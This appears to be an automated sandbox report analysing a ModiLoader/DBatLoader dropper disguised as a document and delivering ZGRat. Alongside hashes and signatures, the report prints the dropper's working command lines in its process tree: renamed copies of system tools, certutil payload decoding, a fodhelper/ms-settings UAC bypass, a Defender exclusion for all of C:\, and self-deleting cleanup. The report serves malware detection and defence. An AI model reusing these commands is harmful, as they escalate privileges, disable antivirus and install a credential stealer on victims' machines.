Analysis
-
max time kernel
145s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
15-05-2024 12:29
Static task
static1
Behavioral task
behavioral1
Sample
doc023561361500.cmd
Resource
win7-20240508-en
General
-
Target
doc023561361500.cmd
-
Size
4.9MB
-
MD5
d05bed0572c3ce597f3b4be7a2606c08
-
SHA1
f621468b397308f1055afaf2f27814a390eb16ea
-
SHA256
e84dd67c7831168c1d7a0f11a78d1e0497eb1cfa8689b25b291ee4b1b96826a4
-
SHA512
4fbe7a932d91882491648b489ec1e2c349ec71423c071e3f751c130e51ae62881473a9feaf3d842c60ed2fb6922b59f0b611491145e84b07e7145efb0ca7ec79
-
SSDEEP
24576:sYkuWvLHtSs/yfVZIC5z65HTGq42xfcJele9P2dxBJGhRC8Ih:sYkuWTcDXB65HPxfhleljIh
Malware Config
Signatures
-
Detect ZGRat V1 33 IoCs
resource yara_rule behavioral2/memory/3708-83-0x000000004C260000-0x000000004C2BC000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-85-0x000000004C870000-0x000000004C8CA000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-87-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-86-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-123-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-125-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-145-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-143-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-139-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-137-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-135-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-133-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-131-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-129-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-127-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-121-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-119-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-117-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-113-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-111-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-109-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-107-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-103-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-141-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-115-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-105-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-101-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-99-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-97-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-95-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-93-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-91-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 behavioral2/memory/3708-89-0x000000004C870000-0x000000004C8C5000-memory.dmp family_zgrat_v1 -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 2 IoCs
resource yara_rule behavioral2/memory/3708-78-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 behavioral2/memory/3708-81-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation per.exe -
Executes dropped EXE 26 IoCs
pid Process 4380 alpha.exe 4772 alpha.exe 1560 alpha.exe 1636 alpha.exe 3836 kn.exe 3132 alpha.exe 3636 alpha.exe 1588 alpha.exe 2956 alpha.exe 4132 xkn.exe 3176 alpha.exe 2912 ger.exe 4912 alpha.exe 3100 kn.exe 1644 per.exe 592 alpha.exe 3104 Ping_c.pif 4932 alpha.exe 4240 alpha.exe 4608 alpha.exe 2948 alpha.exe 2284 alpha.exe 456 alpha.exe 3328 alpha.exe 1560 alpha.exe 3708 huqnearJ.pif -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 37 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3104 set thread context of 3708 3104 Ping_c.pif 134 -
Kills process with taskkill 1 IoCs
pid Process 1300 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 35 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 4132 xkn.exe 4132 xkn.exe 3708 huqnearJ.pif 3708 huqnearJ.pif 3708 huqnearJ.pif -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4132 xkn.exe Token: SeDebugPrivilege 1300 taskkill.exe Token: SeDebugPrivilege 3708 huqnearJ.pif -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2892 wrote to memory of 2576 2892 cmd.exe 86 PID 2892 wrote to memory of 2576 2892 cmd.exe 86 PID 2892 wrote to memory of 4380 2892 cmd.exe 87 PID 2892 wrote to memory of 4380 2892 cmd.exe 87 PID 2892 wrote to memory of 4772 2892 cmd.exe 88 PID 2892 wrote to memory of 4772 2892 cmd.exe 88 PID 2892 wrote to memory of 1560 2892 cmd.exe 89 PID 2892 wrote to memory of 1560 2892 cmd.exe 89 PID 1560 wrote to memory of 3328 1560 alpha.exe 91 PID 1560 wrote to memory of 3328 1560 alpha.exe 91 PID 2892 wrote to memory of 1636 2892 cmd.exe 92 PID 2892 wrote to memory of 1636 2892 cmd.exe 92 PID 1636 wrote to memory of 3836 1636 alpha.exe 93 PID 1636 wrote to memory of 3836 1636 alpha.exe 93 PID 2892 wrote to memory of 3132 2892 cmd.exe 95 PID 2892 wrote to memory of 3132 2892 cmd.exe 95 PID 3132 wrote to memory of 4496 3132 alpha.exe 96 PID 3132 wrote to memory of 4496 3132 alpha.exe 96 PID 2892 wrote to memory of 3636 2892 cmd.exe 97 PID 2892 wrote to memory of 3636 2892 cmd.exe 97 PID 3636 wrote to memory of 2532 3636 alpha.exe 98 PID 3636 wrote to memory of 2532 3636 alpha.exe 98 PID 2892 wrote to memory of 1588 2892 cmd.exe 99 PID 2892 wrote to memory of 1588 2892 cmd.exe 99 PID 1588 wrote to memory of 3512 1588 alpha.exe 100 PID 1588 wrote to memory of 3512 1588 alpha.exe 100 PID 2892 wrote to memory of 2956 2892 cmd.exe 101 PID 2892 wrote to memory of 2956 2892 cmd.exe 101 PID 2956 wrote to memory of 4132 2956 alpha.exe 102 PID 2956 wrote to memory of 4132 2956 alpha.exe 102 PID 4132 wrote to memory of 3176 4132 xkn.exe 103 PID 4132 wrote to memory of 3176 4132 xkn.exe 103 PID 3176 wrote to memory of 2912 3176 alpha.exe 104 PID 3176 wrote to memory of 2912 3176 alpha.exe 104 PID 2892 wrote to memory of 4912 2892 cmd.exe 105 PID 2892 wrote to memory of 4912 2892 cmd.exe 105 PID 4912 wrote to memory of 3100 4912 alpha.exe 106 PID 4912 wrote to memory of 3100 4912 alpha.exe 106 PID 2892 wrote to memory of 1644 2892 cmd.exe 107 PID 2892 wrote to memory of 1644 2892 cmd.exe 107 PID 2892 wrote to memory of 592 2892 cmd.exe 114 PID 2892 wrote to memory of 592 2892 cmd.exe 114 PID 592 wrote to memory of 1300 592 alpha.exe 115 PID 592 wrote to memory of 1300 592 alpha.exe 115 PID 2892 wrote to memory of 3104 2892 cmd.exe 117 PID 2892 wrote to memory of 3104 2892 cmd.exe 117 PID 2892 wrote to memory of 3104 2892 cmd.exe 117 PID 2892 wrote to memory of 4932 2892 cmd.exe 118 PID 2892 wrote to memory of 4932 2892 cmd.exe 118 PID 2892 wrote to memory of 4240 2892 cmd.exe 119 PID 2892 wrote to memory of 4240 2892 cmd.exe 119 PID 2892 wrote to memory of 4608 2892 cmd.exe 120 PID 2892 wrote to memory of 4608 2892 cmd.exe 120 PID 2892 wrote to memory of 2948 2892 cmd.exe 121 PID 2892 wrote to memory of 2948 2892 cmd.exe 121 PID 2892 wrote to memory of 2284 2892 cmd.exe 122 PID 2892 wrote to memory of 2284 2892 cmd.exe 122 PID 2892 wrote to memory of 456 2892 cmd.exe 123 PID 2892 wrote to memory of 456 2892 cmd.exe 123 PID 2892 wrote to memory of 3328 2892 cmd.exe 124 PID 2892 wrote to memory of 3328 2892 cmd.exe 124 PID 2892 wrote to memory of 1560 2892 cmd.exe 125 PID 2892 wrote to memory of 1560 2892 cmd.exe 125 PID 3104 wrote to memory of 3708 3104 Ping_c.pif 134
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:2576
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
PID:4380
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
PID:4772
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:3328
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
PID:3836
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵PID:4496
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵PID:2532
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵PID:3512
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
PID:2912
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
PID:3100
-
-
-
C:\Windows \System32\per.exe"C:\\Windows \\System32\\per.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1644
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Users\Public\Libraries\huqnearJ.pifC:\Users\Public\Libraries\huqnearJ.pif3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
PID:4932
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
PID:4240
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
PID:4608
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2948
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2284
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:456
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
PID:3328
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1560
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper1⤵PID:4796
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.7MB
MD5ba58a19a6475eff2c5bb9b6dfc7d9dd3
SHA1407eda96d6cc766e17a6a27cf37cc63dd82537f3
SHA25622d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57
SHA5126e53a2642c36cddc8cad22ca898c358d3393bd0a880fb5d364cb4aa38ef200b9b0b06dd03a13d05ef91e9867cb172eb2e05a021f0b28282028f8a1eaacdaf9e0
-
Filesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
Filesize
3.4MB
MD5c5d58251c6989580fcf2b5d75ea57467
SHA11b5c775600d8aa1e247574a9ff8620a3c2e74347
SHA25636df0e80ac34f848b1934565413598f7c2087a81e6e4bd69de10be2f86ed15ee
SHA5129efdb53e6902716f1e4ee794dd1e315080817c6eb8045f8a2c62478fb05d8aae7d53b3a8595842f319f49c8075f7522341feea66a47b0f438690905e405c76fc
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
75KB
MD5227f63e1d9008b36bdbcc4b397780be4
SHA1c0db341defa8ef40c03ed769a9001d600e0f4dae
SHA256c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d
SHA512101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9
-
Filesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
48KB
MD585018be1fd913656bc9ff541f017eacd
SHA126d7407931b713e0f0fa8b872feecdb3cf49065a
SHA256c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5
SHA5123e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459